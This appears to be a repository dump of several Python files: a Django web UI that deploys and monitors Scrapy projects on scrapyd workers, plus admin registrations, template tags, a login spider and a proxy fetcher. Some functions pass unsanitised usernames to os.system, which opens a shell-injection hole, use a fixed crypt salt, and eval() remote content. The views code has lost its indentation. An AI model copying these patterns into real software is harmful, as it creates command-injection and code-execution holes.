settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
settingspy += '\nMONGODB_URI = "%s"' % settings.MONGODB_URI
settingspy += '\nMONGODB_SHARDED = %s' % settings.MONGODB_SHARDED
settingspy += '\nMONGODB_BUFFER_DATA = %s' % settings.MONGODB_BUFFER_DATA
settingspy += '\nMONGODB_USER = "%s"' % settings.MONGODB_USER
settingspy += '\nMONGODB_PASSWORD = "%s"' % settings.MONGODB_PASSWORD
settingspy += '\nITEM_PIPELINES = { "%s.mongodb.scrapy_mongodb.MongoDBPipeline": 999, \n' % projectnameonfile
for key in pipelinedict:
settingspy += '"%s.pipelines.%s": %s, \n' % (projectnameonfile, key, pipelinedict[key])
settingspy += '}'
with open(scrapersettingsfile, 'w') as f:
f.write(settingspy)
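    # For illustration only (names and orders are hypothetical), the generated tail of
    # the scraper settings.py ends up looking roughly like:
    #   ITEM_PIPELINES = { "alice_shop.mongodb.scrapy_mongodb.MongoDBPipeline": 999,
    #   "alice_shop.pipelines.CleanPricePipeline": 100,
    #   }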
#putting setup.py files in appropriate folders
with open(basepath + '/scrapy_templates/setup.py', 'r') as f:
setuppy = Template(f.read()).substitute(projectname=projectnameonfile)
with open(linkgenouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
with open(scraperouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
class cd:
"""Context manager for changing the current working directory"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
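    # The two blocks below package each project half as a Python egg via
    # "python setup.py bdist_egg"; the deploy code further down uploads those eggs
    # to the scrapyd "addversion.json" endpoint of the link generator and of every
    # scraper worker listed in settings.SCRAPERS.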
with cd(linkgenouterfolder):
os.system("python setup.py bdist_egg")
with cd(scraperouterfolder):
os.system("python setup.py bdist_egg")
linkgeneggfile = glob.glob(linkgenouterfolder + "/dist/*.egg")
scrapereggfile = glob.glob(scraperouterfolder + "/dist/*.egg")
linkgenlastdeploy = LinkgenDeploy.objects.filter(project=project).order_by('-version')[:1]
if linkgenlastdeploy:
linkgenlastdeploy = linkgenlastdeploy[0].version
else:
linkgenlastdeploy = 0
scraperslastdeploy = ScrapersDeploy.objects.filter(project=project).order_by('-version')[:1]
if scraperslastdeploy:
scraperslastdeploy = scraperslastdeploy[0].version
else:
scraperslastdeploy = 0
try:
with open(linkgeneggfile[0], 'rb') as f:
files = {'egg': f}
payload = {'project': '%s' % (projectnameonfile), 'version': (linkgenlastdeploy + 1)}
r = requests.post('%s/addversion.json' % settings.LINK_GENERATOR, data=payload, files=files, timeout=(3, None))
result = r.json()
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
if result["status"] != "ok":
deploylinkgen.success = False
else:
deploylinkgen.success = True
deploylinkgen.save()
except:
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
deploylinkgen.success = False
deploylinkgen.save()
with open(scrapereggfile[0], 'rb') as f:
eggfile = f.read()
files = {'egg' : eggfile}
payload = {'project': '%s' % (projectnameonfile), 'version': (scraperslastdeploy + 1)}
deployscraper = ScrapersDeploy()
deployscraper.project = project
deployscraper.version = scraperslastdeploy + 1
deployedscraperslist = []
scrapercounter = 1
for onescraper in settings.SCRAPERS:
try:
r = requests.post('%s/addversion.json' % onescraper, data=payload, files=files, timeout=(3, None))
result = r.json()
if result['status'] == 'ok':
deployedscraperslist.append("worker%s" %scrapercounter)
except:
pass
scrapercounter += 1
deployscraper.success = json.dumps(deployedscraperslist)
deployscraper.save()
return HttpResponseRedirect(reverse('deploystatus', args=(projectname,)))
@login_required
def deployment_status(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
counter = 1
workers.append({'name': 'linkgenerator', 'status': 'Loading...', 'version': 'Loading...'})
for worker in settings.SCRAPERS:
workers.append({'name': 'worker%s' % counter, 'status': 'Loading...', 'version': 'Loading...'})
counter += 1
return render(request, "deployment_status.html", {'project': projectname, 'username': request.user.username, 'workers': workers})
@login_required
def get_project_status_from_all_workers(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
counter = 1
if request.method == 'POST':
allworkers = []
workerstatus = {}
workerstatus['name'] = 'linkgenerator'
try:
r = requests.get('%s/listprojects.json' % settings.LINK_GENERATOR,timeout=(3, None))
result = r.json()
if uniqueprojectname in result['projects']:
workerstatus['status'] = 'ready'
try:
q = requests.get('%s/listversions.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname},timeout=(3, None))
qresult = q.json()
version = qresult['versions'][-1]
workerstatus['version'] = version
except:
workerstatus['version'] = 'unknown'
try:
s = requests.get('%s/listjobs.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname}, timeout=(3, None))
sresult = s.json()
if sresult['finished']:
workerstatus['status'] = 'finished'
if sresult['pending']:
workerstatus['status'] = 'pending'
if sresult['running']:
workerstatus['status'] = 'running'
except:
workerstatus['status'] = 'unknown'
else:
                workerstatus['status'] = 'not deployed'
workerstatus['version'] = 'unknown'
except:
workerstatus['status'] = 'unreachable'
workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
for worker in settings.SCRAPERS:
workerstatus = {}
workerstatus['name'] = 'worker%s' % counter
try:
r = requests.get('%s/listprojects.json' % worker, timeout=(3, None))
result = r.json()
if uniqueprojectname in result['projects']:
workerstatus['status'] = 'ready'
try:
q = requests.get('%s/listversions.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
qresult = q.json()
version = qresult['versions'][-1]
workerstatus['version'] = version
except:
workerstatus['version'] = 'unknown'
try:
s = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
sresult = s.json()
if sresult['finished']:
workerstatus['status'] = 'finished'
if sresult['pending']:
workerstatus['status'] = 'pending'
if sresult['running']:
workerstatus['status'] = 'running'
except:
workerstatus['status'] = 'unknown'
else:
                    workerstatus['status'] = 'not deployed'
workerstatus['version'] = 'unknown'
except:
workerstatus['status'] = 'unreachable'
workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
counter += 1
return JsonResponse(allworkers, safe=False)
@login_required
def start_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.post('%s/schedule.json' % linkgenaddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.post('%s/schedule.json' % workeraddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % linkgenaddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % workeraddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def see_log_file(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
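    # scrapyd serves finished-job logs at /logs/<project>/<spider>/<job id>.log;
    # here project and spider share the same unique name, so the path repeats it.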
if request.method == 'GET':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (linkgenaddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (workeraddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
return HttpResponse(log.text, content_type='text/plain')
@login_required
def gather_status_for_all_projects(request):
projectsdict = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
workers.append(settings.LINK_GENERATOR)
projects = Project.objects.filter(user=request.user)
for project in projects:
projectsdict[project.project_name] = []
project_items = Item.objects.filter(project=project)
for item in project_items:
projectsdict[project.project_name].append(item.item_name)
if request.method == 'POST':
if projectsdict:
allprojectdata = {}
for key in projectsdict:
workerstatus = {}
earliest_start_time = None
earliest_finish_time = None
latest_start_time = None
latest_finish_time = None
uniqueprojectname = request.user.username + '_' + key
for worker in workers:
try:
log = requests.get('%s/logs/%s/%s/stats.log' % (worker, uniqueprojectname, uniqueprojectname), timeout=(3, None))
if log.status_code == 200:
result = json.loads(log.text.replace("'", '"'))
if result.get('project_stopped', 0):
workerstatus['finished'] = workerstatus.get('finished', 0) + 1
else:
workerstatus['running'] = workerstatus.get('running', 0) + 1
if result.get('log_count/ERROR', 0):
workerstatus['errors'] = workerstatus.get('errors', 0) + result.get('log_count/ERROR', 0)
for item in projectsdict[key]:
if result.get(item, 0):
workerstatus['item-%s' % item] = workerstatus.get('item-%s' % item, 0) + result.get(item, 0)
if result.get('start_time', False):
start_time = dateutil.parser.parse(result['start_time'])
if earliest_start_time is None:
earliest_start_time = start_time
else:
if start_time < earliest_start_time:
earliest_start_time = start_time
if latest_start_time is None:
latest_start_time = start_time
else:
if start_time > latest_start_time:
latest_start_time = start_time
if result.get('finish_time', False):
finish_time = dateutil.parser.parse(result['finish_time'])
if earliest_finish_time is None:
earliest_finish_time = finish_time
else:
if finish_time < earliest_finish_time:
earliest_finish_time = finish_time
if latest_finish_time is None:
latest_finish_time = finish_time
else:
if finish_time > latest_finish_time:
latest_finish_time = finish_time
elif log.status_code == 404:
workerstatus['hasntlaunched'] = workerstatus.get('hasntlaunched', 0) + 1
else:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
except:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
if earliest_start_time is not None:
workerstatus['earliest_start_time'] = earliest_start_time.strftime("%B %d, %Y %H:%M:%S")
if earliest_finish_time is not None:
workerstatus['earliest_finish_time'] = earliest_finish_time.strftime("%B %d, %Y %H:%M:%S")
if latest_start_time is not None:
workerstatus['latest_start_time'] = latest_start_time.strftime("%B %d, %Y %H:%M:%S")
if latest_finish_time is not None:
workerstatus['latest_finish_time'] = latest_finish_time.strftime("%B %d, %Y %H:%M:%S")
allprojectdata[key] = workerstatus
return JsonResponse(allprojectdata, safe=True)
return HttpResponse('{}')
@login_required
def editsettings(request, settingtype, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
if settingtype == 'linkgenerator':
settingtext = project.settings_link_generator
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if settingtype == 'scraper':
settingtext = project.settings_scraper
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Settings(request.POST)
if form.is_valid():
if settingtype == "linkgenerator":
project.settings_link_generator = form.cleaned_data['settings']
project.save()
if settingtype == "scraper":
project.settings_scraper = form.cleaned_data['settings']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, "editsettings.html",
{'username': request.user.username, 'project': projectname, 'form': form,
'settingtype': settingtype})
@login_required
def start_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.post('%s/schedule.json' % worker, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % worker, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def get_global_system_status(request):
status = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
worker_count = 0
for worker in workers:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(worker).hostname
port = int(urlparse(worker).port)
result = sock.connect_ex((host, port))
if result == 0:
worker_count += 1
except:
pass
finally:
sock.close()
status['scrapers'] = worker_count
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(settings.LINK_GENERATOR).hostname
port = int(urlparse(settings.LINK_GENERATOR).port)
result = sock.connect_ex((host, port))
if result == 0:
status['linkgenerator'] = True
else:
status['linkgenerator'] = False
except:
status['linkgenerator'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
result = sock.connect_ex((settings.RABBITMQ_HOST, settings.RABBITMQ_PORT))
if result == 0:
status['queue'] = True
else:
status['queue'] = False
except:
status['queue'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse("http://" + settings.MONGODB_URI).hostname
port = int(urlparse("http://" + settings.MONGODB_URI).port)
result = sock.connect_ex((host, port))
if result == 0:
status['database'] = True
else:
status['database'] = False
except:
status['database'] = False
finally:
sock.close()
status['databaseaddress'] = settings.MONGODB_PUBLIC_ADDRESS
return JsonResponse(status, safe=False)
@login_required
def share_db(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareDB()
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareDB(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'sharedb.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_db, args=(uniqueprojectname, username.username, projectname, request.user.username), kwargs={})
thr.start()
return render(request, 'sharedb_started.html',
{'username': request.user.username})
else:
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
@login_required
def share_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareProject()
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareProject(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'shareproject.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_project, args=(username.username, projectname, request.user.username), kwargs={})
thr.start()
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
def sharing_db(dbname, target_user, projectname, username):
target_db_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
existing_dbs = connection.database_names()
checked_all_database_names = 0
db_version = 1
while not checked_all_database_names:
checked_all_database_names = 1
for onedbname in existing_dbs:
if str(onedbname) == target_db_name:
target_db_name += str(db_version)
db_version += 1
checked_all_database_names = 0
existing_dbs = connection.database_names()
database = connection[dbname]
if settings.MONGODB_SHARDED:
try:
connection.admin.command('enableSharding', target_db_name)
except:
pass
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
if settings.MONGODB_SHARDED:
try:
connection.admin.command('shardCollection', '%s.%s' % (target_db_name, collection_name),
key={'_id': "hashed"})
except:
pass
col = connection[dbname][collection_name]
insertcol = connection[target_db_name][collection_name]
skip = 0
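            # copy the source collection into the shared database in batches of 100
            # documents, dropping the original _id values so MongoDB assigns new ones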
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip*100)
items = []
for item in collection:
items.append(item)
while len(items) > 0:
skip += 1
insertcol.insert_many(items)
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip * 100)
items = []
for item in collection:
items.append(item)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_db_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_db_name
dataset.save()
connection.close()
def sharing_project(target_user, projectname, username):
target_project_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
project = Project.objects.get(user=User.objects.get(username=username), project_name=projectname)
newproject = Project(user=targetuser, project_name=target_project_name, link_generator=project.link_generator,
scraper_function=project.scraper_function, settings_scraper=project.settings_scraper,
settings_link_generator=project.settings_link_generator)
newproject.save()
items = Item.objects.filter(project=project)
for item in items:
newitem = Item(item_name=item.item_name, project=newproject)
newitem.save()
fields = Field.objects.filter(item=item)
for field in fields:
newfield = Field(item=newitem, field_name=field.field_name)
newfield.save()
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
newpipeline = Pipeline(project=newproject, pipeline_function=pipeline.pipeline_function,
pipeline_name=pipeline.pipeline_name, pipeline_order=pipeline.pipeline_order)
newpipeline.save()
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_user + '_' + target_project_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_user + '_' + target_project_name
dataset.save()
connection.close()
def mongodb_user_creation(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('createUser', username, pwd=password, roles=[])
connection.close()
def mongodb_user_password_change(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('updateUser', username, pwd=password)
connection.close()
def linux_user_creation(username, password):
encpass = crypt.crypt(password, "2424")
os.system("useradd -p " + encpass + " %s" % username)
os.system("mkdir /home/%s" % username)
os.system("chown %s:%s /home/%s" % (username, username, username))
def linux_user_pass_change(username, password):
encpass = crypt.crypt(password, "2424")
os.system("usermod -p " + encpass + " %s" % username)
@login_required
def database_preview(request, db):
datasets = Dataset.objects.filter(user=request.user)
databases = []
for dataset in datasets:
databases.append(dataset.database)
if db not in databases:
return HttpResponseNotFound('Nothing is here.')
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
database = connection[db]
preview_data = {}
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
col = database[collection_name]
collection = col.find(filter={}, projection={'_id': False}, limit=10, skip=0)
items = []
for item in collection:
items.append(item)
preview_data[collection_name] = json.dumps(items, ensure_ascii=False)
return render(request, template_name="databasepreview.html",
context={'username': request.user.username, 'databases': databases, 'preview_data': preview_data})
|
Python
| 1,663
| 42.61335
| 181
|
/Web-UI/scrapyproject/views.py
| 0.59794
| 0.594783
|
mrpal39/ev_code
|
refs/heads/master
|
from django.contrib import admin
from .models import Products,feeds,MyModel,Post
# Register your models here.
admin.site.register(Products)
admin.site.register(feeds)
admin.site.register(MyModel)
admin.site.register(Post)
|
Python
| 9
| 23.888889
| 47
|
/awssam/ideablog/core/admin.py
| 0.8125
| 0.8125
|
mrpal39/ev_code
|
refs/heads/master
|
from django.contrib import admin
# Register your models here.
from blog.models import Tag, Article, Category
@admin.register(Article)
class ArticleAdmin(admin.ModelAdmin):
date_hierarchy = 'date_time'
list_display = ('title', 'category', 'author', 'date_time', 'view')
list_filter = ('category', 'author')
filter_horizontal = ('tag',)
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
pass
@admin.register(Tag)
class TagAdmin(admin.ModelAdmin):
pass
|
Python
| 24
| 19.75
| 71
|
/awssam/django-blog/src/blog/admin.py
| 0.706827
| 0.706827
|
mrpal39/ev_code
|
refs/heads/master
|
from django import template
from django.db.models import Q
from django.conf import settings
from django.template.defaultfilters import stringfilter
from django.utils.safestring import mark_safe
import random
from django.urls import reverse
# from blog.models import Article, Category, Tag, Links, SideBar, LinkShowType
from django.utils.encoding import force_text
from django.shortcuts import get_object_or_404
import hashlib
import urllib
# from comments.models import Comment
from DjangoBlog.utils import cache_decorator, cache
from django.contrib.auth import get_user_model
from oauth.models import OAuthUser
from DjangoBlog.utils import get_current_site
import logging
logger = logging.getLogger(__name__)
register = template.Library()
@register.simple_tag
def timeformat(data):
try:
return data.strftime(settings.TIME_FORMAT)
# print(data.strftime(settings.TIME_FORMAT))
# return "ddd"
except Exception as e:
logger.error(e)
return ""
@register.simple_tag
def datetimeformat(data):
try:
return data.strftime(settings.DATE_TIME_FORMAT)
except Exception as e:
logger.error(e)
return ""
@register.filter(is_safe=True)
@stringfilter
def custom_markdown(content):
from DjangoBlog.utils import CommonMarkdown
return mark_safe(CommonMarkdown.get_markdown(content))
|
Python
| 52
| 25.346153
| 78
|
/myapi/fullfeblog/blog/blog_tags.py
| 0.750547
| 0.748359
|
mrpal39/ev_code
|
refs/heads/master
|
import scrapy
class DemoSpider(scrapy.Spider):
name = 'demo'
start_urls = ['http://www.something.com/users/login.php']
def parse(self, response):
return scrapy.FormRequest.from_response(
response,
formdata = {'username': 'admin', 'password': 'confidential'},
callback = self.after_login
)
def after_login(self, response):
if "authentication failed" in response.body:
self.logger.error("Login failed")
return
# You can continue scraping here
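        # Minimal continuation sketch (URL and callback are hypothetical): once the
        # login succeeded, schedule the pages that need an authenticated session, e.g.
        #   return scrapy.Request(
        #       url='http://www.something.com/users/profile.php',
        #       callback=self.parse_profile,
        #   )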
|
Python
| 16
| 32.875
| 69
|
/scrap/tuto/tuto/spiders/dataviaHTTPPOST.py
| 0.608133
| 0.608133
|
mrpal39/ev_code
|
refs/heads/master
|
from django.contrib import admin
from django.urls import path,include
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.sitemaps.views import sitemap
from blog.sitemaps import PostSitemap
from django.conf.urls import url, include
# from .. import core
sitemaps={
'posts':PostSitemap,
}
urlpatterns = [
path('admin/', admin.site.urls, ),
path('',include('blog.urls')),
path('core/',include('core.urls')),
path('api/',include('api.urls')),
# path('oauth/',include('oauth.urls')),
path('accounts/', include('allauth.urls')),
path('sitemap.xml', sitemap, {'sitemaps': sitemaps},
name='django.contrib.sitemaps.views.sitemap')
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
Python
| 24
| 31.416666
| 65
|
/myapi/fullfeblog/webdev/urls.py
| 0.70399
| 0.70399
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import random
import requests
def GetIps():
    li = []
    url = 'http://139.199.182.250:8000/?types=0&count=300'
ips=requests.get(url)
for ip in eval(ips.content):
li.append(ip[0]+':'+ip[1])
return li
GetIps()
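# Hedged alternative sketch: if the proxy endpoint can return JSON instead of a
# Python literal (an assumption, not verified here), the eval() call above could
# be replaced with something like:
#   import json
#   proxies = ['%s:%s' % (ip, port) for ip, port in json.loads(ips.text)]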
|
Python
| 13
| 19.76923
| 56
|
/tc_zufang/tc_zufang-slave/tc_zufang/utils/GetProxyIp.py
| 0.592593
| 0.511111
|
mrpal39/ev_code
|
refs/heads/master
|
from .settings import *
from .dev import *
# Test codehilite with pygments
WIKI_MARKDOWN_KWARGS = {
"extensions": [
"codehilite",
"footnotes",
"attr_list",
"headerid",
"extra",
]
}
|
Python
| 13
| 16.76923
| 31
|
/awssam/wikidj/wikidj/codehilite.py
| 0.541126
| 0.541126
|